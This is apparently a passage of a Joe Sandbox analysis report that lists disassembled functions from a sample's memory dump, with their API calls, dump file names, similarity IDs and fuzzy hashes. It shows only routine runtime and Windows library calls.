                                              Function 00B555C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              • __lock_file.LIBCMT ref: 00B5560B
                                                • Part of subcall function 00B56E3E: __lock.LIBCMT ref: 00B56E61
                                              • __fclose_nolock.LIBCMT ref: 00B55616
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 388dc836909c192636f315383a711d5802497db2287c16a75129c059d059329e
                                              • Instruction ID: 61983b05ad17f9f024b4a016866c0ce11abd32942bcd8a7dafea055aa1d0f6c9
                                              • Opcode Fuzzy Hash: 388dc836909c192636f315383a711d5802497db2287c16a75129c059d059329e
                                              • Instruction Fuzzy Hash: 58F024B1802B449AD7306B359C1276E77E16F10333F2182C9AC24BB1C1DF7C4A098F51
                                              Function 00B55E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              • __lock_file.LIBCMT ref: 00B55EB4
                                              • __ftell_nolock.LIBCMT ref: 00B55EBF
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2999321469-0
                                              • Opcode ID: 2d26c415307dba10be5253e89eb5408c4f64094b5fcb1ed6370f6b5beebe60cf
                                              • Instruction ID: c0f3e87b21ba92468101681654a392421233c33bedc5f4b664b2fc61ee9ba9ad
                                              • Opcode Fuzzy Hash: 2d26c415307dba10be5253e89eb5408c4f64094b5fcb1ed6370f6b5beebe60cf
                                              • Instruction Fuzzy Hash: 83F0A0719116159ADB20BB74880375E76E06F05333F2142C6AC24BB1D2CFB88E4A9A91
                                              Function 00B45AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B45AEF
                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B45B1F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell__memset
                                              • String ID:
                                              • API String ID: 928536360-0
                                              • Opcode ID: 5f526f8ee1de3c4b88b195b3dc127e5e987433d3b87857f560cade5b938b33b1
                                              • Instruction ID: b69584cbb22c0b8e311f9749e8ccd67d61f61fee6fae313eb2da5afacab86859
                                              • Opcode Fuzzy Hash: 5f526f8ee1de3c4b88b195b3dc127e5e987433d3b87857f560cade5b938b33b1
                                              • Instruction Fuzzy Hash: 40F0A7708183089FD7A29F24DC497A677BC9701308F0001EAFA4897292DF714B98CF91
                                              Function 00BAC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LoadString$__swprintf
                                              • String ID:
                                              • API String ID: 207118244-0
                                              • Opcode ID: a85bfe6de5dfbc1a69bd69403bd43fc23c20758db532f3fd19d6b5452556fc88
                                              • Instruction ID: 17dfe625decfdd5a2ff8cdb9ecfe647c870539c826737974c3b0f6f71dfb4886
                                              • Opcode Fuzzy Hash: a85bfe6de5dfbc1a69bd69403bd43fc23c20758db532f3fd19d6b5452556fc88
                                              • Instruction Fuzzy Hash: 77B13C34E0410AAFCF14EF98D8919EDBBF5FF59710F24809AF915AB291DB30AA41CB50
                                              Function 00B3A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                              • Instruction ID: 1ad34b53d6d9613bc8092bfce9533430589883268cbdf92446677ba648d3145b
                                              • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                              • Instruction Fuzzy Hash: 8961CF70600206DFDB20DF54C881B7AB7E9EF44310F3582ADE89AAB291D775ED81CB51
                                              Function 00B3D679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58bd48562970cca933c86c48be757e10ac83bbcabcd2967da65c87250b2c4e5a
                                              • Instruction ID: 1978ecce10b9b43e8a9bcd308d84c62d8bbc5338f65cacf0d91f05840dbdadfc
                                              • Opcode Fuzzy Hash: 58bd48562970cca933c86c48be757e10ac83bbcabcd2967da65c87250b2c4e5a
                                              • Instruction Fuzzy Hash: C75161356006049BCF24EB68C991F6E77E5EF45710F2885E8F81AAB392CB70EE05DB51
                                              Function 00B4343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                              • Instruction ID: 6df1aec9ef1e0c174b1bd59d6ff6e3e2a2e71f7874feffa1f4ca69024908b3f7
                                              • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                              • Instruction Fuzzy Hash: 7C31A179604602DFD724DF18D490A65F7E0FF08720718C5E9E98A8B791D730EE81DB94
                                              Function 00B4410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B441B2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: e75c3dcf11f2698fdad44a0206f6a45ef1dd39bc3c9a54d67968cc840c63fef1
                                              • Instruction ID: 21e9e031a6f7f3c719b8879923ed00f56691ce2cd74ac001a150de730174b268
                                              • Opcode Fuzzy Hash: e75c3dcf11f2698fdad44a0206f6a45ef1dd39bc3c9a54d67968cc840c63fef1
                                              • Instruction Fuzzy Hash: F5313C71A00616AFDB18DF6DC880B5DBBF5FF58310F148659E815A3710D770AAA4DB90
                                              Function 00B6E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 17cd48199414a02777d8652e3e520d72cb631f64d891fc9572ca111d17b78aee
                                              • Instruction ID: 205de5ec7c5dd00c13fbacf23b4c5f3b1ad45349fbe69a5dd84e1e62b2abc27a
                                              • Opcode Fuzzy Hash: 17cd48199414a02777d8652e3e520d72cb631f64d891fc9572ca111d17b78aee
                                              • Instruction Fuzzy Hash: 4C410674508341DFDB24DF18C484B1ABBE1FF45318F1988ACE9999B362C375E885CB92
                                              Function 00B449C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B44B29: FreeLibrary.KERNEL32(00000000,?), ref: 00B44B63
                                                • Part of subcall function 00B5547B: __wfsopen.LIBCMT ref: 00B55486
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00B427AF,?,00000001), ref: 00B449F4
                                                • Part of subcall function 00B44ADE: FreeLibrary.KERNEL32(00000000), ref: 00B44B18
                                                • Part of subcall function 00B448B0: _memmove.LIBCMT ref: 00B448FA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: d53bbbb78f96f33a31f7923479e886fbac96eaa6ed46007a2a27c82944df5726
                                              • Instruction ID: 55fd97407f6413be5edfb25ee7b6bd0b9abf834d5ec25883e9889890d68e8e43
                                              • Opcode Fuzzy Hash: d53bbbb78f96f33a31f7923479e886fbac96eaa6ed46007a2a27c82944df5726
                                              • Instruction Fuzzy Hash: 92112732650205ABDB10FB74CC06FAE73E9EF40701F1044ADF541A6191EFB08B25B795
                                              Function 00B6E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: db82fa23415eb7e19fa93cded163cd2c30fa7975a8d1a54e70cfa6c6176bd8e9
                                              • Instruction ID: 9941dff5f3f979c43a9e4e6794a09b2eaf2a2a905d751e27a426f38826afb478
                                              • Opcode Fuzzy Hash: db82fa23415eb7e19fa93cded163cd2c30fa7975a8d1a54e70cfa6c6176bd8e9
                                              • Instruction Fuzzy Hash: 3B21F374508341EFDB24DF54C484B1ABBE1BF88304F1989ACF88A57362D731E849CB92
                                              Function 00B44220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00B43CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B44276
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: ce2d7241530621acabaa8524ae72e7ef9c039d9d1a0e7de33c53b1fc5558118f
                                              • Instruction ID: 71634e54d455b6322743e10dd2f35d955142277125482d5cedb3ee36e81109bb
                                              • Opcode Fuzzy Hash: ce2d7241530621acabaa8524ae72e7ef9c039d9d1a0e7de33c53b1fc5558118f
                                              • Instruction Fuzzy Hash: 16113A312107019FE720CF55C480B62B7F5FF88750F14C96DE8AA86A50D7B0EA55EB60
                                              Function 00B41A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                              • Instruction ID: 4d0e89a794c0e53ad352bfe575d686d0b9604ab0b3769100d6e9d6ad46ac8d8e
                                              • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                              • Instruction Fuzzy Hash: 6D01DB726117016ED3245F3CD802B67B7E4DB44790F1089A9F92ACA1D1DA71E5849B54
                                              Function 00BA495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00BA4998
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID:
                                              • API String ID: 1431749950-0
                                              • Opcode ID: 1afeb32a21ef0977f33cd64f6a8778df37c5cc271b9286dd126876f275c8e154
                                              • Instruction ID: 81896291a11f70473ec136a1a080d15f0b3cd9b96891239e96011106dbdcf1ef
                                              • Opcode Fuzzy Hash: 1afeb32a21ef0977f33cd64f6a8778df37c5cc271b9286dd126876f275c8e154
                                              • Instruction Fuzzy Hash: FAF03135618204AF8B14FB65D846D9F77FCEF59720B0044D5F8049B291DE70BD45CB50
                                              Function 00B97C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                              • _memset.LIBCMT ref: 00B97CB4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw_memsetstd::exception::exception
                                              • String ID:
                                              • API String ID: 525207782-0
                                              • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                              • Instruction ID: eec70e98f8b91a2e1f7110f9f9f47c91ea620ed349ed9195f004eab1fe52148e
                                              • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                              • Instruction Fuzzy Hash: 0901E4742042009FD361EF5CD941F06BBE1EF69710F2484AAF9888B392DB72A840CB90
                                              Function 00B44A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _fseek
                                              • String ID:
                                              • API String ID: 2937370855-0
                                              • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                              • Instruction ID: d2a475cf337dacba8b05263a5cceef9b26fefd76fd1ab5cc2f26c6df5676f399
                                              • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                              • Instruction Fuzzy Hash: B7F085B6800208BFDF109F84DC00DEBBBB9EB89320F004198F9045A220D232EA25DBA0
                                              Function 00B44A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,?,00B427AF,?,00000001), ref: 00B44A63
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 875572e7ecaca872b97525a715cd4d8ba32b1a1d70859fddd41932b1543f482c
                                              • Instruction ID: a39dd6b05d876578f708b90ebad8df0be6adf042fd21c5310f599036152ca2c7
                                              • Opcode Fuzzy Hash: 875572e7ecaca872b97525a715cd4d8ba32b1a1d70859fddd41932b1543f482c
                                              • Instruction Fuzzy Hash: 53F01571145711CFCB349F64E490A16BBF0EF1432632489AEE1E683610C731AA94EF44
                                              Function 00B44AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                              • Instruction ID: 3385454b2621fffd4d2c0b1413065d1a072b45a1b3216621c2477515915d1588
                                              • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                              • Instruction Fuzzy Hash: 75F0FE7140010DFFDF05DF94C941EAA7BB9FB14315F108589FD154A111D336DA21EB91
                                              Function 00B509C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B509E4
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
